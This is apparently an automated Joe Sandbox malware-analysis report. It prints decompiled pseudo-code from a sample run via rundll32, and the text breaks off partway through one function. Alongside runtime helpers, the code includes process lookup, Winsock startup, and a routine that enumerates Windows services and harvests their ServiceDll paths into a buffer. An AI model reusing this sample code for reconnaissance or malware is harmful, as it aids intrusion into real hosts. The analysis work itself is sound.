                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                              • API String ID: 2103483237-192647395
                                                                                              • Opcode ID: 48d7a84ace76642717ad00bf1c76e3e2bf9c321983cd38fe63f888bcbb4e4430
                                                                                              • Instruction ID: 267861f924e97f0c1d4caf04c5250d284c009f71d35c16a9d551639d3ce3999e
                                                                                              • Opcode Fuzzy Hash: 48d7a84ace76642717ad00bf1c76e3e2bf9c321983cd38fe63f888bcbb4e4430
                                                                                              • Instruction Fuzzy Hash: CAF02731F2A20F67DB00EEB8A9057EAB3F4DB48314F100354FC48A2140EA256ED0C3A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 327 428a208-428a232 call 4288930 call 428a327 call 4289f9c 334 428a238-428a240 call 42884e7 327->334 335 428a234-428a236 327->335 338 428a245-428a24d 334->338 336 428a28b-428a28e 335->336 339 428a27d 338->339 340 428a24f-428a270 call 428a3c9 338->340 342 428a27f-428a28a call 42884ad 339->342 345 428a28f-428a293 340->345 346 428a272-428a277 call 4281772 340->346 342->336 348 428a29a-428a2a5 345->348 349 428a295 call 4288e59 345->349 346->339 352 428a2bc-428a2d6 348->352 353 428a2a7-428a2b1 348->353 349->348 352->342 356 428a2d8-428a2df 352->356 353->352 355 428a2b3-428a2bb call 42884ad 353->355 355->352 356->342 358 428a2e1-428a2f8 call 4289e72 356->358 358->342 362 428a2fa-428a304 358->362 362->342
                                                                                              C-Code - Quality: 95%
                                                                                              			E0428A208(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                                              				char _v8;
                                                                                              				char _v16;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				char _t31;
                                                                                              				void* _t32;
                                                                                              				char _t40;
                                                                                              				intOrPtr _t44;
                                                                                              				char _t45;
                                                                                              				signed int _t51;
                                                                                              				void* _t64;
                                                                                              				void* _t70;
                                                                                              				signed int _t75;
                                                                                              				void* _t81;
                                                                                              
                                                                                              				_t81 = __eflags;
                                                                                              				_v8 = E04288930(__ebx, __ecx, __edx);
                                                                                              				E0428A327(__ebx, __ecx, __edx, _t81);
                                                                                              				_t31 = E04289F9C(_t81, _a4);
                                                                                              				_v16 = _t31;
                                                                                              				_t57 =  *(_v8 + 0x48);
                                                                                              				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_push(__ebx);
                                                                                              				_t32 = E042884E7(_t57, 0x220); // executed
                                                                                              				_t70 = _t32;
                                                                                              				_t51 = __ebx | 0xffffffff;
                                                                                              				__eflags = _t70;
                                                                                              				if(__eflags == 0) {
                                                                                              					L5:
                                                                                              					_t75 = _t51;
                                                                                              					goto L6;
                                                                                              				} else {
                                                                                              					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                                                              					 *_t70 =  *_t70 & 0x00000000;
                                                                                              					_t75 = E0428A3C9(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70);
                                                                                              					__eflags = _t75 - _t51;
                                                                                              					if(_t75 != _t51) {
                                                                                              						__eflags = _a8;
                                                                                              						if(_a8 == 0) {
                                                                                              							E04288E59();
                                                                                              						}
                                                                                              						asm("lock xadd [eax], ebx");
                                                                                              						__eflags = _t51 == 1;
                                                                                              						if(_t51 == 1) {
                                                                                              							_t45 = _v8;
                                                                                              							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x42a4410;
                                                                                              							if( *((intOrPtr*)(_t45 + 0x48)) != 0x42a4410) {
                                                                                              								E042884AD( *((intOrPtr*)(_t45 + 0x48)));
                                                                                              							}
                                                                                              						}
                                                                                              						 *_t70 = 1;
                                                                                              						_t64 = _t70;
                                                                                              						_t70 = 0;
                                                                                              						 *(_v8 + 0x48) = _t64;
                                                                                              						_t40 = _v8;
                                                                                              						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                                                              						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                                                              							__eflags =  *0x42a46e0 & 0x00000001;
                                                                                              							if(( *0x42a46e0 & 0x00000001) == 0) {
                                                                                              								_v16 =  &_v8;
                                                                                              								E04289E72(5,  &_v16);
                                                                                              								__eflags = _a8;
                                                                                              								if(_a8 != 0) {
                                                                                              									_t44 =  *0x42a4630; // 0x683f28
                                                                                              									 *0x42a40fc = _t44;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						L6:
                                                                                              						E042884AD(_t70);
                                                                                              						return _t75;
                                                                                              					} else {
                                                                                              						 *((intOrPtr*)(E04281772())) = 0x16;
                                                                                              						goto L5;
                                                                                              					}
                                                                                              				}
                                                                                              			}


















                                                                                              0x0428a208
                                                                                              0x0428a215
                                                                                              0x0428a218
                                                                                              0x0428a220
                                                                                              0x0428a229
                                                                                              0x0428a22c
                                                                                              0x0428a232
                                                                                              0x00000000
                                                                                              0x0428a234
                                                                                              0x0428a238
                                                                                              0x0428a240
                                                                                              0x0428a245
                                                                                              0x0428a247
                                                                                              0x0428a24b
                                                                                              0x0428a24d
                                                                                              0x0428a27d
                                                                                              0x0428a27d
                                                                                              0x00000000
                                                                                              0x0428a24f
                                                                                              0x0428a25c
                                                                                              0x0428a262
                                                                                              0x0428a26a
                                                                                              0x0428a26e
                                                                                              0x0428a270
                                                                                              0x0428a28f
                                                                                              0x0428a293
                                                                                              0x0428a295
                                                                                              0x0428a295
                                                                                              0x0428a2a0
                                                                                              0x0428a2a4
                                                                                              0x0428a2a5
                                                                                              0x0428a2a7
                                                                                              0x0428a2aa
                                                                                              0x0428a2b1
                                                                                              0x0428a2b6
                                                                                              0x0428a2bb
                                                                                              0x0428a2b1
                                                                                              0x0428a2bc
                                                                                              0x0428a2c2
                                                                                              0x0428a2c7
                                                                                              0x0428a2c9
                                                                                              0x0428a2cc
                                                                                              0x0428a2cf
                                                                                              0x0428a2d6
                                                                                              0x0428a2d8
                                                                                              0x0428a2df
                                                                                              0x0428a2e4
                                                                                              0x0428a2ed
                                                                                              0x0428a2f2
                                                                                              0x0428a2f8
                                                                                              0x0428a2fa
                                                                                              0x0428a2ff
                                                                                              0x0428a2ff
                                                                                              0x0428a2f8
                                                                                              0x0428a2df
                                                                                              0x0428a27f
                                                                                              0x0428a280
                                                                                              0x00000000
                                                                                              0x0428a272
                                                                                              0x0428a277
                                                                                              0x00000000
                                                                                              0x0428a277
                                                                                              0x0428a270

                                                                                              APIs
                                                                                                • Part of subcall function 04288930: GetLastError.KERNEL32(?,00000000,0427EFC2,00000000,00000002,?,0427FC23,04280991,00000000,?,00000002), ref: 04288934
                                                                                                • Part of subcall function 04288930: _free.LIBCMT ref: 04288967
                                                                                                • Part of subcall function 04288930: SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04280991,00000000,?,0426707A,00000002), ref: 042889A8
                                                                                                • Part of subcall function 04288930: _abort.LIBCMT ref: 042889AE
                                                                                                • Part of subcall function 0428A327: _abort.LIBCMT ref: 0428A359
                                                                                                • Part of subcall function 0428A327: _free.LIBCMT ref: 0428A38D
                                                                                                • Part of subcall function 04289F9C: GetOEMCP.KERNEL32(00000000,?,?,0428A225,?), ref: 04289FC7
                                                                                              • _free.LIBCMT ref: 0428A280
                                                                                              • _free.LIBCMT ref: 0428A2B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID: (?h$(?h
                                                                                              • API String ID: 2991157371-1072286998
                                                                                              • Opcode ID: 55f931eaae36d038ecd0932f458f43874858d15acd291851d09e50103ec79140
                                                                                              • Instruction ID: b35d7b884943886a9f8a77cd144beb76b92cc02aea9d049d900cb36bc0e9a14e
                                                                                              • Opcode Fuzzy Hash: 55f931eaae36d038ecd0932f458f43874858d15acd291851d09e50103ec79140
                                                                                              • Instruction Fuzzy Hash: 12319231B15109AFEB20BFA8D440BAD77E4EF45324F25419EE8149B2D0EF72AE41CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 363 4266ef0-4266f1a OpenProcess 364 4266fa5-4266fb5 call 4275afe 363->364 365 4266f20-4266f37 K32GetModuleFileNameExW 363->365 365->364 367 4266f39-4266f4c call 427d9be 365->367 371 4266f77-4266f7f 367->371 372 4266f4e-4266f51 367->372 373 4266f81-4266f8f 371->373 374 4266f53-4266f61 372->374 373->373 375 4266f91-4266fa4 call 4275afe 373->375 374->374 376 4266f63-4266f76 call 4275afe 374->376
                                                                                              C-Code - Quality: 45%
                                                                                              			E04266EF0(long __ecx, short* __edx, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v528;
                                                                                              				signed int _t14;
                                                                                              				void* _t17;
                                                                                              				void* _t21;
                                                                                              				signed int _t23;
                                                                                              				signed short* _t26;
                                                                                              				signed short* _t33;
                                                                                              				signed int _t36;
                                                                                              				short* _t41;
                                                                                              				void* _t42;
                                                                                              				void* _t43;
                                                                                              				signed int _t44;
                                                                                              
                                                                                              				_t14 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t14 ^ _t44;
                                                                                              				_t41 = __edx;
                                                                                              				 *__edx = 0;
                                                                                              				_t17 = OpenProcess(0x400, 0, __ecx);
                                                                                              				if(_t17 == 0) {
                                                                                              					L9:
                                                                                              					return E04275AFE(_v8 ^ _t44);
                                                                                              				} else {
                                                                                              					__imp__GetModuleFileNameExW(_t17, 0,  &_v528, 0x104); // executed
                                                                                              					if(_t17 == 0) {
                                                                                              						goto L9;
                                                                                              					} else {
                                                                                              						_t21 = E0427D9BE( &_v528, 0x5c);
                                                                                              						if(_t21 == 0) {
                                                                                              							_t33 =  &_v528;
                                                                                              							_t42 = _t41 - _t33;
                                                                                              							do {
                                                                                              								_t23 =  *_t33 & 0x0000ffff;
                                                                                              								_t33 =  &(_t33[1]);
                                                                                              								 *(_t42 + _t33 - 2) = _t23;
                                                                                              							} while (_t23 != 0);
                                                                                              							return E04275AFE(_v8 ^ _t44);
                                                                                              						} else {
                                                                                              							_t26 = _t21 + 2;
                                                                                              							_t43 = _t41 - _t26;
                                                                                              							do {
                                                                                              								_t36 =  *_t26 & 0x0000ffff;
                                                                                              								_t26 =  &(_t26[1]);
                                                                                              								 *(_t43 + _t26 - 2) = _t36;
                                                                                              							} while (_t36 != 0);
                                                                                              							return E04275AFE(_v8 ^ _t44);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}
















                                                                                              0x04266ef9
                                                                                              0x04266f00
                                                                                              0x04266f06
                                                                                              0x04266f0f
                                                                                              0x04266f12
                                                                                              0x04266f1a
                                                                                              0x04266fa5
                                                                                              0x04266fb5
                                                                                              0x04266f20
                                                                                              0x04266f2f
                                                                                              0x04266f37
                                                                                              0x00000000
                                                                                              0x04266f39
                                                                                              0x04266f42
                                                                                              0x04266f4c
                                                                                              0x04266f77
                                                                                              0x04266f7f
                                                                                              0x04266f81
                                                                                              0x04266f81
                                                                                              0x04266f84
                                                                                              0x04266f87
                                                                                              0x04266f8c
                                                                                              0x04266fa4
                                                                                              0x04266f4e
                                                                                              0x04266f4e
                                                                                              0x04266f51
                                                                                              0x04266f53
                                                                                              0x04266f53
                                                                                              0x04266f56
                                                                                              0x04266f59
                                                                                              0x04266f5e
                                                                                              0x04266f76
                                                                                              0x04266f76
                                                                                              0x04266f4c
                                                                                              0x04266f37

                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000), ref: 04266F12
                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,?,00000104), ref: 04266F2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileModuleNameOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3261405110-0
                                                                                              • Opcode ID: e3a25f63e0f48ca4cf3c27703c7ebd7b34ca3037b103250c996f8e02e27393df
                                                                                              • Instruction ID: 39a0e6b2c47c5a45bd01af5405c7c108f4651b7b12760a26fe19768e1f7baaa6
                                                                                              • Opcode Fuzzy Hash: e3a25f63e0f48ca4cf3c27703c7ebd7b34ca3037b103250c996f8e02e27393df
                                                                                              • Instruction Fuzzy Hash: 9A11DA71B202099BDB24EF78D855BBAB3B8DF04300F0141ADEC0AD72C0FAB5AD448740
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 381 42884e7-42884f3 382 4288525-4288530 call 4281772 381->382 383 42884f5-42884f7 381->383 390 4288532-4288534 382->390 385 42884f9-42884fa 383->385 386 4288510-4288521 RtlAllocateHeap 383->386 385->386 388 42884fc-4288503 call 428bc5c 386->388 389 4288523 386->389 388->382 393 4288505-428850e call 42809ac 388->393 389->390 393->382 393->386
                                                                                              C-Code - Quality: 94%
                                                                                              			E042884E7(void* __ecx, long _a4) {
                                                                                              				void* __esi;
                                                                                              				void* _t4;
                                                                                              				void* _t6;
                                                                                              				void* _t7;
                                                                                              				long _t8;
                                                                                              
                                                                                              				_t7 = __ecx;
                                                                                              				_t8 = _a4;
                                                                                              				if(_t8 > 0xffffffe0) {
                                                                                              					L7:
                                                                                              					 *((intOrPtr*)(E04281772())) = 0xc;
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				}
                                                                                              				if(_t8 == 0) {
                                                                                              					_t8 = _t8 + 1;
                                                                                              				}
                                                                                              				while(1) {
                                                                                              					_t4 = RtlAllocateHeap( *0x42a767c, 0, _t8); // executed
                                                                                              					if(_t4 != 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					__eflags = E0428BC5C();
                                                                                              					if(__eflags == 0) {
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					_t6 = E042809AC(_t7, _t8, __eflags, _t8);
                                                                                              					_pop(_t7);
                                                                                              					__eflags = _t6;
                                                                                              					if(_t6 == 0) {
                                                                                              						goto L7;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t4;
                                                                                              			}








                                                                                              0x042884e7
                                                                                              0x042884ed
                                                                                              0x042884f3
                                                                                              0x04288525
                                                                                              0x0428852a
                                                                                              0x04288530
                                                                                              0x00000000
                                                                                              0x04288530
                                                                                              0x042884f7
                                                                                              0x042884f9
                                                                                              0x042884f9
                                                                                              0x04288510
                                                                                              0x04288519
                                                                                              0x04288521
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04288501
                                                                                              0x04288503
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04288506
                                                                                              0x0428850b
                                                                                              0x0428850c
                                                                                              0x0428850e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0428850e
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000001,00000004), ref: 04288519
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 40d4c36521b507d183dabf17729bbc7cb0884d0b1935f9a851d018149022c2bb
                                                                                              • Instruction ID: 74f2f60ad9ade92293c005cb3307820219c2079c70cdeec3704d7506d016e35d
                                                                                              • Opcode Fuzzy Hash: 40d4c36521b507d183dabf17729bbc7cb0884d0b1935f9a851d018149022c2bb
                                                                                              • Instruction Fuzzy Hash: 08E065353371225AE7213A696C04B6F3648EF417E0F97012DAD55964D0EF68F80181A6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 68%
                                                                                              			E04251050(void* __ecx, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				signed int _t4;
                                                                                              				signed int _t12;
                                                                                              				void* _t13;
                                                                                              
                                                                                              				_t4 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t4 ^ _t12;
                                                                                              				E04291860(__ecx);
                                                                                              				__imp__#115(_t13); // executed
                                                                                              				 *0x42a7b0c = 0x190;
                                                                                              				E04275EA1(__eflags, 0x4292fe0);
                                                                                              				return E04275AFE(_v8 ^ _t12, 0x202);
                                                                                              			}







                                                                                              0x04251054
                                                                                              0x0425105b
                                                                                              0x04251063
                                                                                              0x0425106e
                                                                                              0x04251079
                                                                                              0x0425107e
                                                                                              0x04251096

                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202), ref: 0425106E
                                                                                                • Part of subcall function 04275EA1: __onexit.LIBCMT ref: 04275EA7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Startup__onexit
                                                                                              • String ID:
                                                                                              • API String ID: 1034835647-0
                                                                                              • Opcode ID: 1d643462a84a6b9c8da58651a50543a7a56285b5ba09132434e4dcca87412239
                                                                                              • Instruction ID: 3bd095c484b9ebb63d91a806068e3e3606a30f7c6e74a17a676c5554f9a0fc10
                                                                                              • Opcode Fuzzy Hash: 1d643462a84a6b9c8da58651a50543a7a56285b5ba09132434e4dcca87412239
                                                                                              • Instruction Fuzzy Hash: 6EE04871F11208BBEB04EFA9A80A55DB7E4EB09754F40006DA80997241EA75BD14DA95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E04262FB0(void* __ebx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v528;
                                                                                              				short _v1048;
                                                                                              				short _v1568;
                                                                                              				short _v2088;
                                                                                              				short _v2608;
                                                                                              				short _v3128;
                                                                                              				void* _v3132;
                                                                                              				int* _v3136;
                                                                                              				int _v3140;
                                                                                              				WCHAR** _v3144;
                                                                                              				long _v3148;
                                                                                              				int* _v3152;
                                                                                              				long _v3156;
                                                                                              				void* _v3160;
                                                                                              				int* _v3164;
                                                                                              				int* _v3168;
                                                                                              				void* _v3172;
                                                                                              				WCHAR* _v3176;
                                                                                              				WCHAR* _v3180;
                                                                                              				WCHAR* _v3184;
                                                                                              				int* _v3188;
                                                                                              				int _v3192;
                                                                                              				intOrPtr _v3196;
                                                                                              				int* _v3200;
                                                                                              				void* _v3204;
                                                                                              				void* _v3208;
                                                                                              				int _v3212;
                                                                                              				signed int _t206;
                                                                                              				int* _t214;
                                                                                              				long _t215;
                                                                                              				int** _t219;
                                                                                              				void* _t220;
                                                                                              				long _t225;
                                                                                              				void* _t234;
                                                                                              				WCHAR** _t252;
                                                                                              				int _t254;
                                                                                              				int _t255;
                                                                                              				int _t256;
                                                                                              				int _t257;
                                                                                              				int _t258;
                                                                                              				int _t259;
                                                                                              				int _t261;
                                                                                              				int _t263;
                                                                                              				int _t265;
                                                                                              				int _t267;
                                                                                              				int _t271;
                                                                                              				signed int _t295;
                                                                                              				signed int _t313;
                                                                                              				signed int _t319;
                                                                                              				signed int _t325;
                                                                                              				signed int _t333;
                                                                                              				int _t355;
                                                                                              				intOrPtr _t377;
                                                                                              				intOrPtr _t378;
                                                                                              				void* _t389;
                                                                                              				void* _t390;
                                                                                              				WCHAR** _t391;
                                                                                              				WCHAR* _t393;
                                                                                              				WCHAR* _t394;
                                                                                              				WCHAR* _t395;
                                                                                              				WCHAR* _t396;
                                                                                              				int* _t402;
                                                                                              				long _t405;
                                                                                              				void* _t408;
                                                                                              				int* _t423;
                                                                                              				void* _t426;
                                                                                              				void* _t443;
                                                                                              				WCHAR** _t444;
                                                                                              				void* _t445;
                                                                                              				void* _t447;
                                                                                              				void* _t448;
                                                                                              				void* _t449;
                                                                                              				void* _t451;
                                                                                              				void* _t453;
                                                                                              				void* _t455;
                                                                                              				void* _t457;
                                                                                              				void* _t459;
                                                                                              				void* _t461;
                                                                                              				void* _t463;
                                                                                              				void* _t470;
                                                                                              				signed int _t473;
                                                                                              				void* _t474;
                                                                                              				void* _t475;
                                                                                              				void* _t476;
                                                                                              				void* _t477;
                                                                                              
                                                                                              				_t206 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t206 ^ _t473;
                                                                                              				_v3168 = 0;
                                                                                              				_v3152 = 0;
                                                                                              				_v3164 = 0;
                                                                                              				_t389 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                              				_v3204 = _t389;
                                                                                              				if(_t389 == 0) {
                                                                                              					L3:
                                                                                              					return E04275AFE(_v8 ^ _t473);
                                                                                              				} else {
                                                                                              					__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, 0, 0,  &_v3168,  &_v3152,  &_v3164, 0);
                                                                                              					_t214 = _v3168;
                                                                                              					if(_t214 != 0) {
                                                                                              						_t215 =  &(_t214[0xb]);
                                                                                              						_v3160 = _t215;
                                                                                              						_t426 = LocalAlloc(0x40, _t215);
                                                                                              						_v3208 = _t426;
                                                                                              						if(_t426 != 0) {
                                                                                              							_v3164 = 0;
                                                                                              							_t219 =  &_v3168;
                                                                                              							__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, _t426, _v3160, _t219,  &_v3152,  &_v3164, 0);
                                                                                              							if(_t219 != 0) {
                                                                                              								_t220 = LocalAlloc(0x40, 0x19000);
                                                                                              								_v3132 = _t220;
                                                                                              								 *_t220 = 0x87;
                                                                                              								_v3148 = 1;
                                                                                              								_t390 = LocalAlloc(0x40, 0x2000);
                                                                                              								_v3188 = 0;
                                                                                              								_v3160 = _t390;
                                                                                              								_v3144 = LocalAlloc(0x40, 0x2000);
                                                                                              								E0427DEA0(_t426,  &_v528, 0, 0x208);
                                                                                              								_t475 = _t474 + 0xc;
                                                                                              								_v3200 = 0;
                                                                                              								if(_v3152 <= 0) {
                                                                                              									_t225 = 1;
                                                                                              								} else {
                                                                                              									_t470 = lstrlenW;
                                                                                              									_t402 = _t426;
                                                                                              									_v3136 = _t402;
                                                                                              									do {
                                                                                              										_t429 = 0x429c5d0;
                                                                                              										_v3196 = 0xffffffff;
                                                                                              										_v3156 = 0x429c5d0;
                                                                                              										 *_v3144 = 0x429c5d0;
                                                                                              										_v3176 = 0x429c5d0;
                                                                                              										_v3180 = 0x429c5d0;
                                                                                              										_v3184 = 0x429c5d0;
                                                                                              										_t234 = OpenServiceW(_v3204,  *_t402, 1);
                                                                                              										_v3140 = _t234;
                                                                                              										if(_t234 == 0) {
                                                                                              											_t391 = _v3144;
                                                                                              										} else {
                                                                                              											_t402 =  &_v3188;
                                                                                              											if(QueryServiceConfigW(_t234, _t390, 0x2000, _t402) != 0) {
                                                                                              												_v3196 =  *((intOrPtr*)(_t390 + 4));
                                                                                              												_t429 =  !=  ?  *((intOrPtr*)(_t390 + 0xc)) : 0x429c5d0;
                                                                                              												_t377 =  *((intOrPtr*)(_t390 + 0x10));
                                                                                              												_v3156 = 0x429c5d0;
                                                                                              												_t412 =  !=  ? _t377 : 0x429c5d0;
                                                                                              												_t378 =  *((intOrPtr*)(_t390 + 0x18));
                                                                                              												_v3176 =  !=  ? _t377 : 0x429c5d0;
                                                                                              												_t414 =  !=  ? _t378 : 0x429c5d0;
                                                                                              												_v3180 =  !=  ? _t378 : 0x429c5d0;
                                                                                              												_t402 =  !=  ?  *((intOrPtr*)(_t390 + 0x1c)) : 0x429c5d0;
                                                                                              												_v3184 = _t402;
                                                                                              											}
                                                                                              											_t391 = _v3144;
                                                                                              											__imp__QueryServiceConfig2W(_v3140, 1, _t391, 0x2000,  &_v3188);
                                                                                              											if( *_t391 == 0) {
                                                                                              												 *_t391 = 0x429c5d0;
                                                                                              											}
                                                                                              											CloseServiceHandle(_v3140);
                                                                                              										}
                                                                                              										E0427DEA0(_t429,  &_v528, 0, 0x208);
                                                                                              										E0427DEA0(_t429,  &_v1048, 0, 0x208);
                                                                                              										wsprintfW( &_v3128, L"SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters",  *_v3136);
                                                                                              										_v3192 = 0x104;
                                                                                              										_v3140 = 0;
                                                                                              										E0427DEA0(_t429,  &_v1048, 0, 0x104);
                                                                                              										_t476 = _t475 + 0x30;
                                                                                              										_v3172 = 0;
                                                                                              										if(RegOpenKeyExW(0x80000002,  &_v3128, 0, 0x20119,  &_v3172) != 0) {
                                                                                              											L21:
                                                                                              											_push(_t402);
                                                                                              											E04265FE0(_t429,  &_v1048);
                                                                                              											E04265DD0(_t391,  &_v1048,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
                                                                                              											_t477 = _t476 + 0xc;
                                                                                              										} else {
                                                                                              											RegQueryValueExW(_v3172, L"ServiceDll", 0,  &_v3212,  &_v1048,  &_v3192);
                                                                                              											_t402 = 1;
                                                                                              											_t363 =  ==  ? 1 : _v3140;
                                                                                              											_v3140 =  ==  ? 1 : _v3140;
                                                                                              											RegCloseKey(_v3172);
                                                                                              											if(_v3140 == 0 || _v3192 <= 0) {
                                                                                              												goto L21;
                                                                                              											} else {
                                                                                              												ExpandEnvironmentStringsW( &_v1048,  &_v528, 0x104);
                                                                                              												E04265DD0(_t391,  &_v528,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
                                                                                              												_t477 = _t476 + 8;
                                                                                              											}
                                                                                              										}
                                                                                              										_t252 = _v3136;
                                                                                              										_v3140 = lstrlenW(_t252[1]);
                                                                                              										_t254 = lstrlenW( *_t391);
                                                                                              										_t255 = lstrlenW( *_t252);
                                                                                              										_t256 = lstrlenW(_v3184);
                                                                                              										_t257 = lstrlenW(_v3180);
                                                                                              										_t258 = lstrlenW(_v3176);
                                                                                              										_t393 = _v3156;
                                                                                              										_t259 = lstrlenW(_t393);
                                                                                              										_t261 = lstrlenW( &_v1568);
                                                                                              										_t263 = lstrlenW( &_v2088);
                                                                                              										_t265 = lstrlenW( &_v2608);
                                                                                              										_t267 = lstrlenW( &_v528);
                                                                                              										_t443 = _v3132;
                                                                                              										_v3156 = _v3148 + 0x3e + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267 + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267;
                                                                                              										_t271 = LocalSize(_t443);
                                                                                              										_t405 = _v3156;
                                                                                              										if(_t271 < _t405) {
                                                                                              											_v3132 = LocalReAlloc(_t443, _t405, 0x42);
                                                                                              										}
                                                                                              										_t444 = _v3136;
                                                                                              										E0427E060(_v3132 + _v3148,  *_t444, 2 + lstrlenW( *_t444) * 2);
                                                                                              										_t445 = _v3148 + 2 + lstrlenW( *_t444) * 2;
                                                                                              										E0427E060(_v3132 + _t445, _v3136[1], 2 + lstrlenW(_v3136[1]) * 2);
                                                                                              										_t447 = _t445 + lstrlenW(_v3136[1]) * 2 + 2;
                                                                                              										E0427E060(_v3132 + _t447,  *_v3144, 2 + lstrlenW( *_v3144) * 2);
                                                                                              										_t295 = lstrlenW( *_v3144);
                                                                                              										_t408 = _v3132;
                                                                                              										_t448 = _t447 + _t295 * 2;
                                                                                              										asm("movups xmm0, [eax+0x8]");
                                                                                              										asm("movups [edi+ecx+0x2], xmm0");
                                                                                              										asm("movups xmm0, [eax+0x18]");
                                                                                              										asm("movups [edi+ecx+0x12], xmm0");
                                                                                              										 *(_t448 + _t408 + 0x22) = _v3136[0xa];
                                                                                              										 *((intOrPtr*)(_t448 + _t408 + 0x26)) = _v3196;
                                                                                              										_t449 = _t448 + 0x2a;
                                                                                              										E0427E060(_v3132 + _t449, _t393, 2 + lstrlenW(_t393) * 2);
                                                                                              										_t451 = _t449 + lstrlenW(_t393) * 2 + 2;
                                                                                              										E0427E060(_v3132 + _t451,  &_v528, 2 + lstrlenW( &_v528) * 2);
                                                                                              										_t313 = lstrlenW( &_v528);
                                                                                              										_t394 = _v3176;
                                                                                              										_t453 = _t451 + _t313 * 2 + 2;
                                                                                              										E0427E060(_v3132 + _t453, _t394, 2 + lstrlenW(_t394) * 2);
                                                                                              										_t319 = lstrlenW(_t394);
                                                                                              										_t395 = _v3180;
